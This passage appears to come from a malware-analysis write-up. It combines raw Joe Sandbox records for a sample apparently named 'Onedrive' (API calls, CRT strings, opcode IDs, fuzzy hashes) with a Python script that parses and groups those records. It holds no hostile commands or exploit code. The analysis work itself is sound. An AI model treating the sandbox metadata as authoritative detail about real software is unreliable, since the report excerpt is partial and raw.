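• GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4), ref: 00007FF63EA16377
• HeapAlloc.KERNEL32(?,?,0000200000000000,00007FF63EA165C4), ref: 00007FF63EA1638B
• memmove.MSVCRT(?,?,0000200000000000,00007FF63EA165C4), ref: 00007FF63EA163BC
• GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4), ref: 00007FF63EA163D2
• HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4), ref: 00007FF63EA163E6
Memory Dump Source
• Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
Similarity
• API ID: Heap$Process$Free$Allocmemmove
• String ID:
• API String ID: 3442027419-0
• Opcode ID: e3ea0ae9526573e326e153ee29c05e8328531308f38c4549085912ce3cfad05f
• Instruction Fuzzy Hash: 24319322F08B5687EA059F96A54407DBAA1FFE9BC1B0A8034EE0DC3344DF3CD449A260
APIs
Strings
• %ls, xrefs: 00007FFDF3B00E4B
• minkernel\\crts\\ucrt\\src\\appcrt\\locale\\locale_refcounting.cpp, xrefs: 00007FFDF3B00E60
Memory Dump Source
• Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
Similarity
• API ID: __free_lconv_mon__free_lconv_num
• String ID: %ls$minkernel\\crts\\ucrt\\src\\appcrt\\locale\\locale_refcounting.cpp
• API String ID: 2148069796-164516335
• Opcode ID: f8c993c3ac616c137a0244c55a8ab641f86d32dc4a5abb803c8119df114f18a7
• Instruction Fuzzy Hash: 0A914F22718A8581EB50CB46E0E577AB360F7D4B80F465136EA9E5BBE9CFBCD485C700
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
SUBCALL_RE = re.compile(r"^•\s+Part of subcall function\s+(?P<func>[0-9A-Fa-f]+):\s+(?P<call>.+?),?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
CALL_RE = re.compile(r"^•\s+(?P<call>.+?),?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^•\s+(?P<value>.*?),\s+xrefs:\s+(?P<xrefs>[0-9A-Fa-f, ]+)$")
SOURCE_RE = re.compile(r"^•\s+Source File:\s+(?P<file>\S+),\s+Offset:\s+(?P<offset>[0-9A-Fa-f]+),\s+based on PE:\s+(?P<pe>true|false)$")
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")


def api_name(call: str) -> str:
    """'GetProcessHeap.KERNEL32(00000000,...)' -> 'GetProcessHeap.KERNEL32'."""
    return call.split("(", 1)[0]


def parse_records(text: str) -> list:
    """Split the report text into records; a record ends at its Instruction Fuzzy Hash line."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            if rec is None:
                rec = {"apis": [], "subcalls": [], "strings": [], "fields": {}}
            continue
        if rec is None or not line.startswith("•"):
            continue  # text outside any record
        if section == "APIs":
            m = SUBCALL_RE.match(line)
            if m:  # calls made by a callee, not by this function directly
                rec["subcalls"].append((m["func"].upper(), api_name(m["call"]), m["ref"].upper()))
                continue
            m = CALL_RE.match(line)
            if m:
                rec["apis"].append((api_name(m["call"]), m["ref"].upper()))
                continue
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                rec["strings"].append(m["value"])
                continue
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(line)
            if m:
                rec["fields"]["Source File"] = m["file"]
                rec["fields"]["Module Base"] = m["offset"].upper()
            continue  # "Associated:" dump lines carry no per-function data
        m = FIELD_RE.match(line)
        if m:
            rec["fields"][m["key"]] = m["value"].strip()
            if m["key"] == "Instruction Fuzzy Hash":  # last line of every record
                records.append(rec)
                rec = None
    return records


def api_sequence(rec: dict) -> list:
    """Direct API calls in call-site address order, DLL suffix dropped."""
    return [name.split(".")[0] for name, ref in sorted(rec["apis"], key=lambda t: int(t[1], 16))]


def group_by_field(records: list, key: str) -> dict:
    groups = defaultdict(list)
    for rec in records:
        groups[rec["fields"].get(key, "")].append(rec["fields"]["Opcode ID"])
    return dict(groups)


def repeated_patterns(records: list) -> dict:
    """API String IDs shared by more than one function body: the same call pattern compiled repeatedly."""
    return {k: v for k, v in group_by_field(records, "API String ID").items() if len(v) > 1}


def functions_per_module(records: list) -> dict:
    return dict(group_by_field(records, "Module Base").items()) and {k: len(v) for k, v in group_by_field(records, "Module Base").items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec["fields"]["Module Base"], rec["fields"]["Opcode ID"][:16], api_sequence(rec) or rec["strings"])
    print("repeated call patterns:", repeated_patterns(recs))
    print("functions per module:", functions_per_module(recs))
```

Grouping on API String ID is an exact match on the tool's own key, so it only finds bodies the tool already keyed identically; it does not attempt to reproduce Joe Sandbox's fuzzy-hash comparison, whose algorithm the report does not describe. The two heap-copy bodies it pairs here sit in the same module, which is the kind of repetition (one buffer-grow helper inlined or duplicated several times) worth checking against the dropped PE rather than the loader process.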
                                                    APIs
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE66B3
                                                      • Part of subcall function 00007FFDF3AF53C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF53D3
                                                      • Part of subcall function 00007FFDF3AF53C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AF53DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
• Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
                                                    • String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
                                                    • API String ID: 4164245112-3476576762
                                                    • Opcode ID: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
                                                    • Instruction ID: 601ff82054fd996d97172b35a990e05182c7aa3c8b2aedca84e4ebc804741f2c
                                                    • Opcode Fuzzy Hash: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
                                                    • Instruction Fuzzy Hash: CD41C671B1CB4296EB50CB16E460A6973A1FB81390F512631E5EE5B6ECEF3CD545CB00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_fp == invalid_function_sentinel()$cached_fp == new_fp
                                                    • API String ID: 0-3288861829
                                                    • Opcode ID: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
                                                    • Instruction ID: c31433414589d5bd1fe4ede24cb0c6fe8c7119dd992ffb5e6e4440b0d2df0660
                                                    • Opcode Fuzzy Hash: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
                                                    • Instruction Fuzzy Hash: AE413931B18B4292EB10DB15F0A0B6A77A4FB85784F910535EA9E5BBEDEF3CE1548700
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle
                                                    • API String ID: 0-3058771551
                                                    • Opcode ID: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
                                                    • Instruction ID: 5a060644e4723381ecdd3d6918e43c35ce33e40dabde9a3e50ef4776b31477ba
                                                    • Opcode Fuzzy Hash: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
                                                    • Instruction Fuzzy Hash: 08413B31B18A4691DB10DB16E0A4B6A73A1FB847A4F510235EABE5BBE8EF3CD1418700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: swprintf
                                                    • String ID: %.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
                                                    • API String ID: 233258989-3778139020
                                                    • Opcode ID: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
                                                    • Instruction ID: 84f7fdf1a1fb29de93792fe569fb6256f924251e3fb4f0825477d22c8fb8acd0
                                                    • Opcode Fuzzy Hash: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
                                                    • Instruction Fuzzy Hash: D9316B7260C68185D7109B56E0A46AABBA0EBC5780F510036EADD5BBEEDF3CD480CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: BuffersErrorFileFlushLast
                                                    • String ID: %ls$("Invalid file descriptor. File possibly closed by a different thread",0)$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                                    • API String ID: 1917127615-1268643607
                                                    • Opcode ID: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
                                                    • Instruction ID: 3468b25782f34f77d9737aa8c47641c99a18f3434cbb0b2876b404fd87e436c0
                                                    • Opcode Fuzzy Hash: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
                                                    • Instruction Fuzzy Hash: 6621C676B18B4686DB11AF25E4A092973A1FB84B80F814131E96D5B3ECDF3CD110C750
                                                    APIs
                                                    • __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AE6216
                                                      • Part of subcall function 00007FFDF3AE66A0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE66B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                                    • String ID: %ls$__crt_stdio_output::stream_output_adapter<char>::validate$_stream.valid()$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 614740146-3062203921
                                                    • Opcode ID: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
                                                    • Instruction ID: 166fd0358bcab5c851459812b5a4cfac832dcb80d898d73d23e418c8564bfd11
                                                    • Opcode Fuzzy Hash: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
                                                    • Instruction Fuzzy Hash: D2217A31F18B4295EB50EB52F464B6AB3A0EB80390F412435E99E5BBEDDF7CD1848B00
                                                    APIs
                                                    • StrToID.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BAB8
                                                    • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BACB
                                                    • ?SetLayoutPos@Element@DirectUI@@QEAAJH@Z.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BAEB
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BB1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectElement@$ContentDescendent@FindLayoutPos@String@V12@
                                                    • String ID: ErrorCID
                                                    • API String ID: 3607310075-3250631935
                                                    • Opcode ID: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
                                                    • Instruction ID: f29733f9bcd0c4c2ad92a6c1ac0b5b2a1f2ccde7a745549880fc355a24a4893e
                                                    • Opcode Fuzzy Hash: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
                                                    • Instruction Fuzzy Hash: 2B110C35B0CB42C7EB049BA6A490179A6E1EFA9B85B449170EA0EC7785DF2CE4089620
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLastwcsncmp
                                                    • String ID: api-ms-
                                                    • API String ID: 3100911417-2084034818
                                                    • Opcode ID: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
                                                    • Instruction ID: 46246a2a912dad0d7b4b1a993a25a7f57e7f80ba7af673cd0f85db45e8b90a69
                                                    • Opcode Fuzzy Hash: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
                                                    • Instruction Fuzzy Hash: 9CF04465B1C94281E760DB13E874B2A7361FF95741F924030DE9DAAAECDF2CD545CB04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
                                                    • Instruction ID: 379abf1c9662477d777961319e0ccd996e59db920b78f8cb8d8ccdbb7e45930f
                                                    • Opcode Fuzzy Hash: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
                                                    • Instruction Fuzzy Hash: 63B16322B08A5286FB01DBB6C4542F927A2AFA9B94F554431FE0DC7794DE3CE449D360
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr
                                                    • API String ID: 0-454128329
                                                    • Opcode ID: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
                                                    • Instruction ID: e9374b84409f1e19077e40817d7aeefb987013d01db7ffa39d45f4ba55a7785c
                                                    • Opcode Fuzzy Hash: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
                                                    • Instruction Fuzzy Hash: 82D11D7660CB85C5D7608B16E460B6AB3A0F7847A4F554235EAEE9BBE8DF3CD444CB00
                                                    APIs
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164C0
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164D5
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164F2
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16507
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16524
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16539
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16556
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1656B
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16588
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1659D
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165CD
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165E1
                                                      • Part of subcall function 00007FF63EA13AFC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA129DD), ref: 00007FF63EA13C8B
                                                      • Part of subcall function 00007FF63EA13AFC: HeapFree.KERNEL32(?,?,?,00007FF63EA129DD), ref: 00007FF63EA13C9F
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA129E6
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA129FA
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA12A29
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA12A3D
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA12A54
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA12A68
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
                                                    • Instruction ID: 07c6dc769e07e96a2365007a6562ad7e3c1b7a800e2e3ff3e8f858b03e34749d
                                                    • Opcode Fuzzy Hash: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
                                                    • Instruction Fuzzy Hash: DD216F32A08B4186E7049FA2E4443B8BBA0FBA9F84F498174EE0E97759DF3CD449D310
                                                    APIs
                                                    • __except_validate_context_record.LIBVCRUNTIMED ref: 00007FFDF3AD34F3
                                                      • Part of subcall function 00007FFDF3AD3F80: _guard_icall_checks_enforced.LIBCMTD ref: 00007FFDF3AD3F89
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __except_validate_context_record_guard_icall_checks_enforced
                                                    • String ID: csm
                                                    • API String ID: 95139742-1018135373
                                                    • Opcode ID: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
                                                    • Instruction ID: f2a4ccfcf6e84fdefb68b26e3a1f994d9659258c84a3cefbb96dab17df754307
                                                    • Opcode Fuzzy Hash: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
                                                    • Instruction Fuzzy Hash: 2EC1D936719B8186DB50CB09E490A6EF7A1F7D8790F515025EA9E8BBE8DF3CE450CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileWrite
                                                    • String ID: U
                                                    • API String ID: 603252729-4171548499
                                                    • Opcode ID: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
                                                    • Instruction ID: 928b94e8bfec3fb6e76cc3321521e08f8f5cafd7f81d6c8e9f8f51a60913ec71
                                                    • Opcode Fuzzy Hash: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
                                                    • Instruction Fuzzy Hash: 9371D736609BC58ADB60CB69E4507AAB7A1F788784F500036EADD97BA8DF7CD444CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __crt_scoped_stack_ptr
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp$stream.valid()
                                                    • API String ID: 1704660383-221745940
                                                    • Opcode ID: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
